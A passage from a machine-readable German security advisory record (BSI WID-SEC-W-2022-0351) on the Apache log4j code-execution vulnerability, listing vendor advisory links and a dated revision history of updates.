"summary": "Red Hat Security Advisory RHSA-2021:5127 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
},
{
"category": "external",
"summary": "QNAP Security Advisory QSA-21-58 vom 2021-12-14",
"url": "https://www.qnap.com/de-de/security-advisory/QSA-21-58"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5128 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5130 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5130"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5133 vom 2021-12-15",
"url": "https://access.redhat.com/errata/RHSA-2021:5133"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526184 vom 2021-12-14",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4shell-vulnerability-affects-ibm-spss-statistics-subscription-cve-2021-44228/"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5134 vom 2021-12-15",
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "external",
"summary": "Apache log4j Security Advisory vom 2021-12-14",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527090 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-plus-container-backup-and-restore-for-kubernetes-and-openshift-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527084 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-operations-center-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527088 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-security-access-manager-for-enterprise-single-sign-on-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526640 vom 2021-12-15",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4j-as-used-in-ibm-qradar-user-behavior-analytics-application-add-on-to-ibm-qradar-siem-is-vulnerable-to-remote-code-execution-rce-cve-2021-44228/"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5148 vom 2021-12-16",
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"category": "external",
"summary": "HCL Article KB0095516 vom 2021-12-16",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095516"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526490 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-has-been-identified-in-websphere-application-server-shipped-with-ibm-websphere-remote-server-cve-2021-44228/"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-5197-1 vom 2021-12-15",
"url": "https://ubuntu.com/security/notices/USN-5197-1"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2021:4097-1 vom 2021-12-15",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2021-December/009912.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5106 vom 2021-12-16",
"url": "https://access.redhat.com/errata/RHSA-2021:5106"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526462 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-some-features-of-ibm-db2-cve-2021-44228/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2021:4096-1 vom 2021-12-15",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2021-December/009911.html"
},
{
"category": "external",
"summary": "SAP Support Center",
"url": "https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527080 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-client-web-user-interface-and-ibm-spectrum-protect-for-virtual-environments-cve-2021-44228/"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-1730 vom 2021-12-16",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2021-1730.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527082 vom 2021-12-16",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-vulnerable-to-a-remote-code-execution-vulnerability-in-log4j2-component/"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-5022 vom 2021-12-16",
"url": "https://lists.debian.org/debian-security-announce/2021/msg00208.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5107 vom 2021-12-16",
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5141 vom 2021-12-16",
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5186 vom 2021-12-17",
"url": "https://access.redhat.com/errata/RHSA-2021:5186"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5183 vom 2021-12-17",
"url": "https://access.redhat.com/errata/RHSA-2021:5183"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5184 vom 2021-12-17",
"url": "https://access.redhat.com/errata/RHSA-2021:5184"
},
{
"category": "external",
"summary": "Siemens Security Advisory SSA-714170 vom 2021-12-16",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527372 vom 2021-12-17",
"url": "https://www.ibm.com/support/pages/node/6527372"
},
{
"category": "external",
"summary": "Atlassian Security Advisory - Log4j",
"url": "https://confluence.atlassian.com/security/multiple-products-security-advisory-log4j-vulnerable-to-remote-code-execution-cve-2021-44228-1103069934.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527226 vom 2021-12-17",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-some-features-of-ibm-db2-on-openshift-and-ibm-db2-and-db2-warehouse-on-cloud-pak-for-data-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527322 vom 2021-12-17",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-db2-warehouse-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527096 vom 2021-12-17",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4jshell-vulnerability-affects-ibm-spss-modeler-cve-2021-44228/"
},
{
"category": "external",
"summary": "Hitachi Vulnerability Information HITACHI-SEC-2021-147 vom 2021-12-17",
"url": "https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2021-147/index.html"
},
{
"category": "external",
"summary": "Palo Alto Networks Security Advisory PAN-184592 vom 2021-12-17",
"url": "https://security.paloaltonetworks.com/CVE-2021-44228"
},
{
"category": "external",
"summary": "Log4j Vulnerabilities Impact On Oracle E-Business Suite Analysis",
"url": "https://www.integrigy.com/security-resources/log4j-vulnerabilities-impact-oracle-e-business-suite-analysis"
},
{
"category": "external",
"summary": "Tibco Apache Log4J Vulnerability Daily Update",
"url": "https://www.tibco.com/support/notices/2021/12/apache-log4j-vulnerability-update-archive-6"
},
{
"category": "external",
"summary": "Avaya Product Security Apache Log4J Vulnerability vom 2021-12-17",
"url": "https://support.avaya.com/helpcenter/getGenericDetails?detailId=1399839287609"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527260 vom 2021-12-20",
"url": "http://www.auscert.org.au/bulletins/ESB-2021.4320"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-1731 vom 2021-12-18",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2021-1731.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-1553 vom 2021-12-18",
"url": "https://alas.aws.amazon.com/ALAS-2021-1553.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALASCORRETTO8-2021-001 vom 2021-12-20",
"url": "https://alas.aws.amazon.com/AL2/ALASCORRETTO8-2021-001.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALASJAVA-OPENJDK11-2021-001 vom 2021-12-20",
"url": "https://alas.aws.amazon.com/AL2/ALASJAVA-OPENJDK11-2021-001.html"
},
{
"category": "external",
"summary": "Citrix Security Advisory CTX335705 vom 2021-12-20",
"url": "https://support.citrix.com/article/CTX335705"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527724 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-collaboration-and-deployment-services-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527824 vom 2021-12-17",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-for-space-management-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527824 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-for-space-management-cve-2021-44228-2/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527824 vom 2021-12-19",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-for-space-management-cve-2021-44228-3/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527894 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-for-vmware-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527874 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4shell-vulnerability-affects-ibm-spss-statistics-desktop-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527828 vom 2021-12-17",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-plus-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527894 vom 2021-12-19",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-for-vmware-cve-2021-44228-2/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527836 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-on-windows-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527836 vom 2021-12-19",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-protect-snapshot-on-windows-cve-2021-44228-2/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527962 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerablity-in-apache-log4j-may-affect-ibm-tivoli-monitoring-installed-websphere-application-server-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6528108 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spectrum-scale-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527762 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-spss-analytic-server-cve-2021-44228/"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-004 vom 2021-12-18",
"url": "https://alas.aws.amazon.com/AL2022/ALAS-2021-004.html"
},
{
"category": "external",
"summary": "HCL Article KB0095587 vom 2021-12-17",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095587"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-5192-2 vom 2021-12-17",
"url": "https://ubuntu.com/security/notices/USN-5192-2"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527768 vom 2021-12-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-vulnerability-affects-ibm-business-automation-workflow-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527924 vom 2021-12-17",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-blockchain-bridge-dependencies-are-vulnerable-to-an-issue-in-apache-log4j-cve-2021-45046/"
},
{
"category": "external",
"summary": "NetApp Security Advisory NTAP-20211215-0001 vom 2021-12-20",
"url": "https://security.netapp.com/advisory/ntap-20211215-0001/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6528432 vom 2021-12-21",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-insights-is-vulnerable-to-a-remote-code-execution-vulnerability-in-apache-log4j-2-component-cve-2021-44228/"
},
{
"category": "external",
"summary": "NetApp Security Advisory NTAP-20211210-0007 vom 2021-12-20",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526420 vom 2021-12-22",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-service-registry-and-repository-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527764 vom 2021-12-22",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-identified-in-ibm-websphere-application-server-shipped-with-ibm-digital-business-automation-workflow-family-products-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6528846 vom 2021-12-22",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-tivoli-network-manager-ip-edition-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6528678 vom 2021-12-22",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-some-features-of-ibm-db2-cve-2021-4104/"
},
{
"category": "external",
"summary": "Incident Report for F-Secure services",
"url": "https://status.f-secure.com/incidents/sk8vmr0h34pd"
},
{
"category": "external",
"summary": "Apache Log4j 2 Release Notes",
"url": "https://logging.apache.org/log4j/log4j-2.12.3/index.html"
},
{
"category": "external",
"summary": "Apache Log4j2 Advisory",
"url": "https://logging.apache.org/log4j/log4j-2.3.1/index.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6536868 vom 2021-12-23",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-apache-log4j-shipped-with-ibm-tivoli-netcool-omnibus-common-integration-libraries-cve-2021-4104-cve-2021-45046-cve-2021-44228/"
},
{
"category": "external",
"summary": "HCL Article KB0095728 vom 2021-12-22",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095728"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6536712 vom 2021-12-23",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-informix-dynamic-server-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6527948 vom 2021-12-23",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-netcool-omnibus-8-1-cve-2021-44228/"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-1732 vom 2021-12-24",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2021-1732.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-1554 vom 2021-12-24",
"url": "https://alas.aws.amazon.com/ALAS-2021-1554.html"
},
{
"category": "external",
"summary": "Hitachi Vulnerability Information HITACHI-SEC-2021-315 vom 2021-12-28",
"url": "https://www.hitachi.co.jp/products/it/storage-solutions/global/sec_info/2021/2021_315.html"
},
{
"category": "external",
"summary": "EMC Security Advisory DSA-2021-274 vom 2022-01-09",
"url": "https://www.dell.com/support/kbdoc/de-de/000194503/dsa-2021-274-dell-emc-data-domain-security-update-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228"
},
{
"category": "external",
"summary": "EMC Security Advisory DSA-2021-309 vom 2022-01-09",
"url": "https://www.dell.com/support/kbdoc/de-de/000194651/dsa-2021-309-dell-emc-dpa-security-update-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228"
},
{
"category": "external",
"summary": "EMC Security Advisory DSA-2021-277 vom 2022-01-09",
"url": "https://www.dell.com/support/kbdoc/de-de/000194480/dsa-2021-277-dell-emc-avamar-update-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228"
},
{
"category": "external",
"summary": "HPE Security Bulletin HPESBGN04215 rev.10 vom 2022-01-08",
"url": "https://support.hpe.com/hpesc/public/docDisplay?elq_mid=17739\u0026elq_cid=67018031\u0026docId=hpesbgn04215en_us"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6539444 vom 2022-01-11",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-ibm-operational-decision-manager-cve-2021-44228/"
},
{
"category": "external",
"summary": "SAP Security Note 3130521 vom 2022-01-11",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0082 vom 2022-01-11",
"url": "https://access.redhat.com/errata/RHSA-2022:0082"
},
{
"category": "external",
"summary": "JobScheduler Vulnerability Release 2.2.1 vom 2022-01-11",
"url": "https://kb.sos-berlin.com/display/PKB/Vulnerability+Release+2.2.1"
},
{
"category": "external",
"summary": "Juniper Security Bulletin JSA11287 vom 2022-01-12",
"url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA11287\u0026cat=SIRT_1"
},
{
"category": "external",
"summary": "SoapUI Release 5.6.1",
"url": "https://www.soapui.org/downloads/latest-release/release-history/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6541008 vom 2022-01-15",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rational-build-forge-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6541258 vom 2022-01-18",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rational-software-architect-realtime-edition-rsa-rt-is-is-vulnerable-to-arbitrary-code-execution-and-denial-of-service-due-to-apache-log4j-cve-2021-44228-cve-2021-45046-and/"
},
{
"category": "external",
"summary": "Unify Security Advisory Report OBSO-2201-01 vom 2022-01-18",
"url": "https://networks.unify.com/security/advisories/OBSO-2201-01.pdf"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0203 vom 2022-01-20",
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0216 vom 2022-01-20",
"url": "https://access.redhat.com/errata/RHSA-2022:0216"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0222 vom 2022-01-21",
"url": "https://access.redhat.com/errata/RHSA-2022:0222"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0205 vom 2022-01-20",
"url": "https://access.redhat.com/errata/RHSA-2022:0205"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0223 vom 2022-01-21",
"url": "https://access.redhat.com/errata/RHSA-2022:0223"
},
{
"category": "external",
"summary": "LibreOffice Security Advisory",
"url": "https://www.libreoffice.org/about-us/security/advisories/cve-2021-44228/"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:0296 vom 2022-01-26",
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
},
{
"category": "external",
"summary": "ASC NEO Release Announcement 6.7 vom 2022-01-24",
"url": "https://www.asc.de/partner/pp_Tech_d.php?Reveal_in_Tree=VW1Wc1pXRnpaU0JCYm01dmRXNWpaVzFsYm5RZ1ptOXlJRzVsYnlCVGRXbDBaU0JXTmk0M0lDd2dOVFEwSUd0Q0xDQXlNREl5TFRBeExUSTArSA=="
},
{
"category": "external",
"summary": "IBM Security Bulletin 6553622 vom 2022-02-04",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-informix-dynamic-server-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228-3/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6553626 vom 2022-02-04",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4j-vulnerability-cve-2021-44228-in-ibm-informix-dynamic-server-in-cloud-pak-for-data-2/"
},
{
"category": "external",
"summary": "HCL Article KB0097471 vom 2022-05-18",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097471"
},
{
"category": "external",
"summary": "HCL Article KB0097299 vom 2022-03-23",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097299"
},
{
"category": "external",
"summary": "HCL Article KB0097470 vom 2022-03-25",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097470"
},
{
"category": "external",
"summary": "HCL Article KB0096807 vom 2022-03-29",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0096807"
},
{
"category": "external",
"summary": "HCL Article KB0097763 vom 2022-04-06",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097763"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:1296 vom 2022-04-11",
"url": "https://access.redhat.com/errata/RHSA-2022:1296"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:1299 vom 2022-04-11",
"url": "https://access.redhat.com/errata/RHSA-2022:1299"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:1297 vom 2022-04-11",
"url": "https://access.redhat.com/errata/RHSA-2022:1297"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2-2022-1773 vom 2022-04-19",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1773.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2022-1580 vom 2022-04-19",
"url": "https://alas.aws.amazon.com/ALAS-2022-1580.html"
},
{
"category": "external",
"summary": "HCL Article KB0097650 vom 2022-04-23",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097650"
},
{
"category": "external",
"summary": "HCL Article KB0097639 vom 2022-04-23",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097639"
},
{
"category": "external",
"summary": "AVAYA Security Advisory ASA-2022-001 vom 2022-04-25",
"url": "https://downloads.avaya.com/css/P8/documents/101081576"
},
{
"category": "external",
"summary": "HCL Article KB0097787 vom 2022-04-28",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0097787"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2022-1806 vom 2022-06-15",
"url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1806.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2022-1601 vom 2022-06-15",
"url": "https://alas.aws.amazon.com/ALAS-2022-1601.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6602955 vom 2022-07-13",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-content-manager-ondemand-for-multiplatforms-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/"
},
{
"category": "external",
"summary": "HCL Article KB0099131 vom 2022-07-24",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099131"
},
{
"category": "external",
"summary": "HCL Article KB0099671 vom 2022-07-24",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099671"
},
{
"category": "external",
"summary": "HCL Article KB0099128 vom 2022-07-24",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099128"
},
{
"category": "external",
"summary": "HCL Article KB0099667 vom 2022-08-13",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099667"
},
{
"category": "external",
"summary": "HCL Article KB0099669 vom 2022-08-13",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099669"
},
{
"category": "external",
"summary": "Kyocera Informationen \u00fcber aktuelle Sicherheitshinweise",
"url": "https://www.kyoceradocumentsolutions.de/de/support/sicherheitsluecken.html"
},
{
"category": "external",
"summary": "HCL Article KB0100505 vom 2022-09-21",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0100505"
}
],
"source_lang": "en-US",
"title": "Apache log4j: Schwachstelle erm\u00f6glicht Codeausf\u00fchrung",
"tracking": {
"current_release_date": "2022-12-11T23:00:00.000+00:00",
"generator": {
"date": "2024-08-15T17:28:30.255+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.5"
}
},
"id": "WID-SEC-W-2022-0351",
"initial_release_date": "2021-12-09T23:00:00.000+00:00",
"revision_history": [
{
"date": "2021-12-09T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2021-12-12T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Fedora, Elastic, ExtremeNetworks, VMware, Fortinet, Amazon, IBM, Debian, Cisco, HCL und Symantec aufgenommen"
},
{
"date": "2021-12-13T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Siemens, Unify und Juniper aufgenommen"
},
{
"date": "2021-12-14T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Ubuntu, Red Hat, IBM, WIBU-SYSTEMS, Fedora und QNAP aufgenommen"
},
{
"date": "2021-12-15T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von IBM, Red Hat, HCL, Ubuntu, SUSE und Amazon aufgenommen"
},
{
"date": "2021-12-16T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Avaya, Red Hat, Siemens, IBM, HITACHI und Palo Alto Networks aufgenommen"
},
{
"date": "2021-12-19T23:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von IBM, Amazon, Citrix, HCL und Ubuntu aufgenommen"
},
{
"date": "2021-12-20T23:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von NetApp und IBM aufgenommen"
},
{
"date": "2021-12-21T23:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2021-12-22T23:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von IBM und HCL aufgenommen"
},
{
"date": "2021-12-23T23:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2021-12-27T23:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von HITACHI aufgenommen"
},
{
"date": "2022-01-06T23:00:00.000+00:00",
"number": "13",
"summary": "Referenz(en) aufgenommen: CSCWA47351, CSCWA52921, CSCWA54650, CSCWA56230"
},
{
"date": "2022-01-09T23:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von EMC und HP aufgenommen"
},
{
"date": "2022-01-10T23:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von IBM und SAP aufgenommen"
},
{
"date": "2022-01-11T23:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-01-12T23:00:00.000+00:00",
"number": "17",
"summary": "Neue Updates von Juniper, SmartBear und SOS GmbH aufgenommen"
},
{
"date": "2022-01-16T23:00:00.000+00:00",
"number": "18",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2022-01-17T23:00:00.000+00:00",
"number": "19",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2022-01-18T23:00:00.000+00:00",
"number": "20",
"summary": "Neue Updates von Unify aufgenommen"
},
{
"date": "2022-01-19T23:00:00.000+00:00",
"number": "21",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-01-20T23:00:00.000+00:00",
"number": "22",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-01-23T23:00:00.000+00:00",
"number": "23",
"summary": "Neue Updates aufgenommen"
},
{
"date": "2022-01-26T23:00:00.000+00:00",
"number": "24",
"summary": "Neue Updates von Red Hat und ASC aufgenommen"
},
{
"date": "2022-02-03T23:00:00.000+00:00",
"number": "25",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2022-03-22T23:00:00.000+00:00",
"number": "26",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-03-24T23:00:00.000+00:00",
"number": "27",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-03-29T22:00:00.000+00:00",
"number": "28",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-04-05T22:00:00.000+00:00",
"number": "29",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-04-11T22:00:00.000+00:00",
"number": "30",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-04-19T22:00:00.000+00:00",
"number": "31",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2022-04-24T22:00:00.000+00:00",
"number": "32",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-04-26T22:00:00.000+00:00",
"number": "33",
"summary": "Neue Updates von AVAYA aufgenommen"
},
{
"date": "2022-04-27T22:00:00.000+00:00",
"number": "34",
"summary": "Neue Updates von HCL aufgenommen"
},
{
